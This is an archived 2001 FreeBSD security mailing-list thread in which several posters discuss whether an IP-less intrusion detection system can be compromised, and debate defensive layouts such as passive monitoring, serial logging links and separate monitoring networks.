[128.143.20.219]) by hub.freebsd.org (Postfix) with ESMTP id 5553E37B443 for ; Sat, 7 Apr 2001 13:16:52 -0700 (PDT) (envelope-from mipam@virginia.edu) Received: by bootp-20-219.bootp.virginia.edu (Postfix) id 886B91D001; Sat, 7 Apr 2001 16:16:44 -0400 (EDT) Date: Sat, 7 Apr 2001 16:16:44 -0400 From: Mipam To: Lee Smallbone Cc: freebsd-security@FreeBSD.ORG Subject: Re: Theory Question Message-ID: <20010407161644.C2212@bootp-20-219.bootp.virginia.edu> Reply-To: mipam@ibb.net References: <200104071610.RAA18117@mailgate.kechara.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104071610.RAA18117@mailgate.kechara.net>; from lee@kechara.net on Sat, Apr 07, 2001 at 04:00:40PM +0100 X-Operating-System: BSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I am of the belief that a machine with no IP address cannot > be 'hacked' (externally), is this true in the real world? Well .. not by any ip traffic for sure, but if it serves as a bridge between certain segments and serves as firewall for example, then you could try to flood it :) by sending loads of traffic to the machines behind it. But in this case it only operates on the layer below the ip layer, for it only looks to mac addresses to forward traffic, but it also does filtering on ip layer .... Thats wrong, well, it's a nice solution for making it pratically impossible to hack the machine from outside the network. (Plz i aint try to start a religious war here, just some thoughts of my own for what they're worth). > > /------\ > /Internet\-----[router]-------[switch]----[various servers] > / \ | | > ------------ | | > | | > [IDS] | > | [firewall] > | | > | | > | | > \ [switch] > \ / \ > \ / \ > \ / \ > \ / \ > \ / [internal lan] > \ / 192.168.1.x > [IDS Log 2] > 192.168.1.x Hmm, looks a bit weird to me. So you're gonna tell the router that all traffic also has to be passed out on the interface to which the ids machine is connected? Why not like this: router | \ | switch | (dmz (screened subnet)) | / | | | \ | / ids | / firewall | switch | \ internal lan ids Now also do some filtering on the router so that the dmz is not completly unprotected. Tell the switches to mirror all the traffic from its other ports to that of the ids. Just give the ids ip addresses (not strictly necessary). And close all udp/tcp ports (only if it has an ip address) on it and block icmp traffic (for the paranoid). All the ids has to do is to listen passively and not generate any traffic at all. You could of course allow ssh2 to the ids from certain internal ip's. But then also allow icmp 3/4 from the firewall to the ids, for the case that the firewall in between cant handle the same mtu as the ids ... (... ahem). For logging to other machines you need to allow ip traffic to the ids indeed. But if you wish to do that, you surely must give the ids's an ip. This is far, far from complete etc, but that was not my intention anyway. Just same suggestions. Bye, Mipam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 14:17:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id AB0C437B423 for ; Sat, 7 Apr 2001 14:17:51 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBFXT200.D8L; Sat, 7 Apr 2001 14:17:26 -0700 Message-ID: <3ACF83FA.55761A7B@globalstar.com> Date: Sat, 07 Apr 2001 14:17:46 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: lee@kechara.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: Theory Question References: <200104071610.RAA18117@mailgate.kechara.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lee Smallbone wrote: > > Hi there, > > I have a theory that I'd like to run past you guys if I may. We have an IDS watching over our network, and currently > it logs to itself, and has a publicly accessible IP address. Now what I want to do is get it to also log to a second > machine, privately addressed, and remove the public IP address from the IDS, and use the private machine to run > stats on and so forth. The primary concern is security. I am of the belief that a machine with no IP address cannot > be 'hacked' (externally), is this true in the real world? No. There is no such thing as a box on a network that 'cannot be hacked.' A possible scenario: Your IDS is listening to the unprotected link to the Internet and chugging away, crunching the data passing by looking for attack signatures. Hiding somewhere in the bowels of this large and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r sends a crafted series of packets past the box which trip the buffer overflow and execute arbitrary code of his choosing on the box. Game over. His code could attach an IP stack to the external interface (just run ifconfig), it could open a tunnel through the backside of the IDS and back out of the front[1] of your network, or if EvulHax0r is really 33l33t, he could set up a covert channel on the external interface that does not use the kernel stack. This is all possible, but not probable. You must weigh the risks and benefits of having the IDS setup in this manner versus other configurations. Security is almost always a series of trade offs. The only absolutely secure network configuration is not to have the device connected to the network at all. There is no such thing as a box on a network that 'cannot be hacked.' [0] An IDS program does not need to be all that big and complex to have vulnerable code hiding in it. Both Snort and tcpdump have had their share of exploitable buffer overruns. [1] Note that in this situation, going that extra step of physically disabling transmission of data on the external interface (snipping or shorting wires) will not save you either. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 14:25:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 6B8A737B422 for ; Sat, 7 Apr 2001 14:25:53 -0700 (PDT) (envelope-from nectar@nectar.com) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id C4F7618D24; Sat, 7 Apr 2001 16:25:52 -0500 (CDT) Received: (from nectar@localhost) by hamlet.nectar.com (8.11.3/8.9.3) id f37LPqT87350; Sat, 7 Apr 2001 16:25:52 -0500 (CDT) (envelope-from nectar@spawn.nectar.com) Date: Sat, 7 Apr 2001 16:25:52 -0500 From: "Jacques A. Vidrine" To: Crist Clark Cc: lee@kechara.net, freebsd-security@FreeBSD.ORG Subject: Re: Theory Question Message-ID: <20010407162552.D87286@hamlet.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ACF83FA.55761A7B@globalstar.com>; from crist.clark@globalstar.com on Sat, Apr 07, 2001 at 02:17:46PM -0700 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote: > A possible scenario: Your IDS is listening to the unprotected link to > the Internet and chugging away, crunching the data passing by looking > for attack signatures. Hiding somewhere in the bowels of this large > and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r > sends a crafted series of packets past the box which trip the buffer > overflow and execute arbitrary code of his choosing on the box. Game > over. His code could attach an IP stack to the external interface > (just run ifconfig), it could open a tunnel through the backside of > the IDS and back out of the front[1] of your network, or if EvulHax0r > is really 33l33t, he could set up a covert channel on the external > interface that does not use the kernel stack. This is why you physically cut the TX wires to the network. That buffer overflow can still be successful, and the machine can still be comprimised, but it cannot be used to make further attacks. The types of comprimises are also limited, since the attacker must work blindly. Of course, the problem is then how do you get useful information out of your IDS? Cheers, -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 14:48:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 87EFB37B42C for ; Sat, 7 Apr 2001 14:48:14 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBFZ7T00.57M; Sat, 7 Apr 2001 14:47:53 -0700 Message-ID: <3ACF8B1D.21272C1C@globalstar.com> Date: Sat, 07 Apr 2001 14:48:13 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: "Jacques A. Vidrine" Cc: lee@kechara.net, freebsd-security@FreeBSD.ORG Subject: Re: Theory Question References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jacques A. Vidrine" wrote: > > On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote: > > A possible scenario: Your IDS is listening to the unprotected link to > > the Internet and chugging away, crunching the data passing by looking > > for attack signatures. Hiding somewhere in the bowels of this large > > and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r > > sends a crafted series of packets past the box which trip the buffer > > overflow and execute arbitrary code of his choosing on the box. Game > > over. His code could attach an IP stack to the external interface > > (just run ifconfig), it could open a tunnel through the backside of > > the IDS and back out of the front[1] of your network, or if EvulHax0r > > is really 33l33t, he could set up a covert channel on the external > > interface that does not use the kernel stack. > > This is why you physically cut the TX wires to the network. That buffer > overflow can still be successful, and the machine can still be > comprimised, but it cannot be used to make further attacks. The types > of comprimises are also limited, since the attacker must work blindly. As I pointed out, it may be possible to use the machine for further attacks even with physically disabling transmission on the external interface. One could conceive of quite a number of ways to establish a tunnel from the internal interface of the IDS, through the firewall, and back out onto the Internet. > Of course, the problem is then how do you get useful information out of > your IDS? Were you indicating to disable transmission on the internal interface? Then why hook it up to the internal network at all? That defeats the purpose of the original poster's design. Going back to the original problem, IMHO, if you want to have data connectivity with the IDS, a fairly secure way to go is to have one or more serial connections to the IDS from the inside. } { Internet }----+---[Firewall]----{ Protected network } | { | [IDS]..................[IDS Mngmnt] (serial line(s)) For example, you could have one console connection and one data connection passing the logging info. The possibility of an attacker gaining further access into your network if the IDS is comprimised is small (but as always, non-zero), and you have all of the access you need to the system. The one caveat being the data rate limitation on a serial line. (And serial lines are even worse when it comes to TEMPEST, but not too many people need concern themselves with that.) -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 14:49: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from cpimssmtpoa02.msn.com (cpimssmtpoa02.msn.com [207.46.181.112]) by hub.freebsd.org (Postfix) with ESMTP id 710A437B43C for ; Sat, 7 Apr 2001 14:49:02 -0700 (PDT) (envelope-from JHowie@msn.com) Received: from cpimssmtpu13.email.msn.com ([207.46.181.88]) by cpimssmtpoa02.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 14:49:01 -0700 Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu13.email.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 14:49:01 -0700 Message-ID: <058701c0bfad$265e8530$0101a8c0@development.local> From: "John Howie" To: "Jacques A. Vidrine" , "Crist Clark" Cc: , References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> Subject: Re: Theory Question Date: Sat, 7 Apr 2001 14:53:11 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-OriginalArrivalTime: 07 Apr 2001 21:49:01.0267 (UTC) FILETIME=[8E840230:01C0BFAC] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I didn't see anyone state the obvious: have a separate monitoring network that is not attached to your production (i.e. behind the interior DMZ firewall) network. If the IDS box is compromised then it could be used to launch attacks against other connected networks. By having it on a separate monitoring network you prevent this scenario. In practice a machine with no IP address that just receives packets is not likely to be vulnerable. Crist's scenario is not a probable one (as he, himself, acknowledges). However, you might find yourself in a situation where a DoS is created against the IDS itself which means that it won't recognise the activity it was deployed to catch. john... ----- Original Message ----- From: "Jacques A. Vidrine" To: "Crist Clark" Cc: ; Sent: Saturday, April 07, 2001 2:25 PM Subject: Re: Theory Question > On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote: > > A possible scenario: Your IDS is listening to the unprotected link to > > the Internet and chugging away, crunching the data passing by looking > > for attack signatures. Hiding somewhere in the bowels of this large > > and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r > > sends a crafted series of packets past the box which trip the buffer > > overflow and execute arbitrary code of his choosing on the box. Game > > over. His code could attach an IP stack to the external interface > > (just run ifconfig), it could open a tunnel through the backside of > > the IDS and back out of the front[1] of your network, or if EvulHax0r > > is really 33l33t, he could set up a covert channel on the external > > interface that does not use the kernel stack. > > This is why you physically cut the TX wires to the network. That buffer > overflow can still be successful, and the machine can still be > comprimised, but it cannot be used to make further attacks. The types > of comprimises are also limited, since the attacker must work blindly. > > Of course, the problem is then how do you get useful information out of > your IDS? > > Cheers, > -- > Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 15: 6: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from cpimssmtpoa01.msn.com (cpimssmtpoa01.msn.com [207.46.181.111]) by hub.freebsd.org (Postfix) with ESMTP id 463C137B42C for ; Sat, 7 Apr 2001 15:06:01 -0700 (PDT) (envelope-from JHowie@msn.com) Received: from cpimssmtpu13.email.msn.com ([207.46.181.88]) by cpimssmtpoa01.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 15:06:00 -0700 Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu13.email.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 15:06:00 -0700 Message-ID: <059301c0bfaf$85d86fb0$0101a8c0@development.local> From: "John Howie" To: "Crist Clark" , "Jacques A. Vidrine" , , References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> <3ACF8B1D.21272C1C@globalstar.com> Subject: Re: Theory Question Date: Sat, 7 Apr 2001 15:10:13 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-OriginalArrivalTime: 07 Apr 2001 22:06:00.0423 (UTC) FILETIME=[EDFADF70:01C0BFAE] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: "Crist Clark" To: "Jacques A. Vidrine" Cc: ; Sent: Saturday, April 07, 2001 2:48 PM Subject: Re: Theory Question [stuff edited out...] > Going back to the original problem, IMHO, if you want to have data > connectivity with the IDS, a fairly secure way to go is to have one > or more serial connections to the IDS from the inside. > > } { > Internet }----+---[Firewall]----{ Protected network > } | { | > [IDS]..................[IDS Mngmnt] > (serial line(s)) > > For example, you could have one console connection and one data connection > passing the logging info. The possibility of an attacker gaining further > access into your network if the IDS is comprimised is small (but as always, > non-zero), and you have all of the access you need to the system. The one > caveat being the data rate limitation on a serial line. (And serial lines > are even worse when it comes to TEMPEST, but not too many people need > concern themselves with that.) Just don't run PPP or SLIP over the serial line (don't laugh, I've seen just this setup and yes, it was compromised). john... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 15:37:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 5EEA937B422 for ; Sat, 7 Apr 2001 15:37:33 -0700 (PDT) (envelope-from nectar@nectar.com) Received: by gw.nectar.com (Postfix, from userid 1001) id CFFC218D29; Sat, 7 Apr 2001 17:37:32 -0500 (CDT) Date: Sat, 7 Apr 2001 17:37:32 -0500 From: "Jacques A. Vidrine" To: Crist Clark Cc: lee@kechara.net, freebsd-security@FreeBSD.ORG Subject: Re: Theory Question Message-ID: <20010407173732.A69155@spawn.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> <3ACF8B1D.21272C1C@globalstar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ACF8B1D.21272C1C@globalstar.com>; from crist.clark@globalstar.com on Sat, Apr 07, 2001 at 02:48:13PM -0700 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Apr 07, 2001 at 02:48:13PM -0700, Crist Clark wrote: > "Jacques A. Vidrine" wrote: > Were you indicating to disable transmission on the internal interface? On `the' interface. > Then why hook it up to the internal network at all? That defeats the > purpose of the original poster's design. I didn't look at the original poster's design. I was referring to an IDS that passively listened to the network. Any other communication with the IDS has to happen out-of-band. Cheers, -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 15:39:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 7328E37B423 for ; Sat, 7 Apr 2001 15:39:11 -0700 (PDT) (envelope-from nectar@nectar.com) Received: by gw.nectar.com (Postfix, from userid 1001) id 08C9718D29; Sat, 7 Apr 2001 17:39:10 -0500 (CDT) Date: Sat, 7 Apr 2001 17:39:10 -0500 From: "Jacques A. Vidrine" To: John Howie Cc: Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG Subject: Re: Theory Question Message-ID: <20010407173910.B69155@spawn.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , John Howie , Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> <058701c0bfad$265e8530$0101a8c0@development.local> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <058701c0bfad$265e8530$0101a8c0@development.local>; from JHowie@msn.com on Sat, Apr 07, 2001 at 02:53:11PM -0700 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Apr 07, 2001 at 02:53:11PM -0700, John Howie wrote: > In practice a machine with no IP address that just receives packets is not > likely to be vulnerable. Crist's scenario is not a probable one (as he, > himself, acknowledges). Such exploits have been seen in the past, e.g. the tcpdump buffer overrun. I guess the assumption is that your opponent is more sophisticated than a script kiddie, and wants something in your network. Cheers, -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 15:44:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from cpimssmtpoa03.msn.com (cpimssmtpoa03.msn.com [207.46.181.113]) by hub.freebsd.org (Postfix) with ESMTP id 827A737B422 for ; Sat, 7 Apr 2001 15:44:40 -0700 (PDT) (envelope-from JHowie@msn.com) Received: from cpimssmtpu13.email.msn.com ([207.46.181.88]) by cpimssmtpoa03.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 15:44:39 -0700 Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu13.email.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 15:44:39 -0700 Message-ID: <05aa01c0bfb4$ec3a0de0$0101a8c0@development.local> From: "John Howie" To: "Jacques A. Vidrine" Cc: "Crist Clark" , , References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> <058701c0bfad$265e8530$0101a8c0@development.local> <20010407173910.B69155@spawn.nectar.com> Subject: Re: Theory Question Date: Sat, 7 Apr 2001 15:48:53 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-OriginalArrivalTime: 07 Apr 2001 22:44:39.0658 (UTC) FILETIME=[545A0CA0:01C0BFB4] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: "Jacques A. Vidrine" To: "John Howie" Cc: "Crist Clark" ; ; Sent: Saturday, April 07, 2001 3:39 PM Subject: Re: Theory Question > On Sat, Apr 07, 2001 at 02:53:11PM -0700, John Howie wrote: > > In practice a machine with no IP address that just receives packets is not > > likely to be vulnerable. Crist's scenario is not a probable one (as he, > > himself, acknowledges). > > Such exploits have been seen in the past, e.g. the tcpdump buffer > overrun. I guess the assumption is that your opponent is more > sophisticated than a script kiddie, and wants something in your > network. > Agreed! And the hacker would also need to have intimate knowledge of your network configuration to be able to supply the correct parameters to ifconfig in the scenario that Crist outlined. One item that was missing from the original design was an exterior DMZ firewall (or perhaps I just missed that component) running NAT. Key to securing the infrastructure is making it as difficult as possible for a hacker to determine DMZ and production network topologies and machine addresses. Regards, john... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 16: 0:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 6031937B422 for ; Sat, 7 Apr 2001 16:00:41 -0700 (PDT) (envelope-from nectar@nectar.com) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 5753718D29; Sat, 7 Apr 2001 18:00:40 -0500 (CDT) Received: (from nectar@localhost) by hamlet.nectar.com (8.11.3/8.9.3) id f37N0eR87509; Sat, 7 Apr 2001 18:00:40 -0500 (CDT) (envelope-from nectar@spawn.nectar.com) Date: Sat, 7 Apr 2001 18:00:40 -0500 From: "Jacques A. Vidrine" To: John Howie Cc: Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG Subject: Re: Theory Question Message-ID: <20010407180040.B87468@hamlet.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , John Howie , Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> <058701c0bfad$265e8530$0101a8c0@development.local> <20010407173910.B69155@spawn.nectar.com> <05aa01c0bfb4$ec3a0de0$0101a8c0@development.local> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <05aa01c0bfb4$ec3a0de0$0101a8c0@development.local>; from JHowie@msn.com on Sat, Apr 07, 2001 at 03:48:53PM -0700 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Apr 07, 2001 at 03:48:53PM -0700, John Howie wrote: > Agreed! And the hacker would also need to have intimate knowledge of your > network configuration to be able to supply the correct parameters to > ifconfig in the scenario that Crist outlined. Well, no. Arbitrary code is just that: arbitrary. Arbitrary code can determine a working configuration for any network interface. And in many cases it will not even be necessary to `ifconfig' the interface to use it. > One item that was missing from > the original design was an exterior DMZ firewall (or perhaps I just missed > that component) running NAT. Key to securing the infrastructure is making it > as difficult as possible for a hacker to determine DMZ and production > network topologies and machine addresses. If the `key' to your security is obscurity of your internal network configuration, expect to be comprimised. This information is not hard to obtain by a determined attacker, and technology is probably not even an issue. Cheers, -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 16:12:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from cpimssmtpoa04.msn.com (cpimssmtpoa04.msn.com [207.46.181.114]) by hub.freebsd.org (Postfix) with ESMTP id 775F837B424 for ; Sat, 7 Apr 2001 16:12:44 -0700 (PDT) (envelope-from JHowie@msn.com) Received: from cpimssmtpu13.email.msn.com ([207.46.181.88]) by cpimssmtpoa04.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 16:12:43 -0700 Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu13.email.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 16:12:42 -0700 Message-ID: <05b901c0bfb8$d79a1160$0101a8c0@development.local> From: "John Howie" To: "Jacques A. Vidrine" Cc: "Crist Clark" , , References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> <058701c0bfad$265e8530$0101a8c0@development.local> <20010407173910.B69155@spawn.nectar.com> <05aa01c0bfb4$ec3a0de0$0101a8c0@development.local> <20010407180040.B87468@hamlet.nectar.com> Subject: Re: Theory Question Date: Sat, 7 Apr 2001 16:16:55 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-OriginalArrivalTime: 07 Apr 2001 23:12:43.0001 (UTC) FILETIME=[3FB3CE90:01C0BFB8] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jacques, You are missing my points (or perhaps I typed too fast to make them clearly). Crist supplied the ifconfig scenario, I just followed up on it, and I thought we were still talking about script kiddies. That said, security can still be strengthened through obscurity but as you quite correctly point out it cannot solely be relied upon. If I force would-be intruders to have to defeat/circumvent individual measures such as firewalls/NAT boxes just to determine my topologies before they can even make an attempt at an attack on servers, then most will give up and go away. With the correct supporting measures in place, obscuring network topology is a valid step to take. john... ----- Original Message ----- From: "Jacques A. Vidrine" To: "John Howie" Cc: "Crist Clark" ; ; Sent: Saturday, April 07, 2001 4:00 PM Subject: Re: Theory Question > On Sat, Apr 07, 2001 at 03:48:53PM -0700, John Howie wrote: > > Agreed! And the hacker would also need to have intimate knowledge of your > > network configuration to be able to supply the correct parameters to > > ifconfig in the scenario that Crist outlined. > > Well, no. Arbitrary code is just that: arbitrary. Arbitrary code can > determine a working configuration for any network interface. And in > many cases it will not even be necessary to `ifconfig' the interface > to use it. > > > One item that was missing from > > the original design was an exterior DMZ firewall (or perhaps I just missed > > that component) running NAT. Key to securing the infrastructure is making it > > as difficult as possible for a hacker to determine DMZ and production > > network topologies and machine addresses. > > If the `key' to your security is obscurity of your internal network > configuration, expect to be comprimised. This information is not hard > to obtain by a determined attacker, and technology is probably not > even an issue. > > Cheers, > -- > Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 7 17:30:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id F389F37B43E; Sat, 7 Apr 2001 17:30:10 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA13994; Sat, 7 Apr 2001 18:30:05 -0600 (MDT) Message-Id: <4.3.2.7.2.20010407182641.0443b910@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 07 Apr 2001 18:29:51 -0600 To: "Brian F. Feldman" , lee@kechara.net From: Brett Glass Subject: Re: Theory Question Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200104071550.f37Fosa31021@green.dyndns.org> References: <200104071610.RAA18117@mailgate.kechara.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:50 AM 4/7/2001, Brian F. Feldman wrote: >How is the IDS logging to another machine without any IP address? You could do it with PPPoE. There'd be no visible IP address, only a MAC address. You could also use 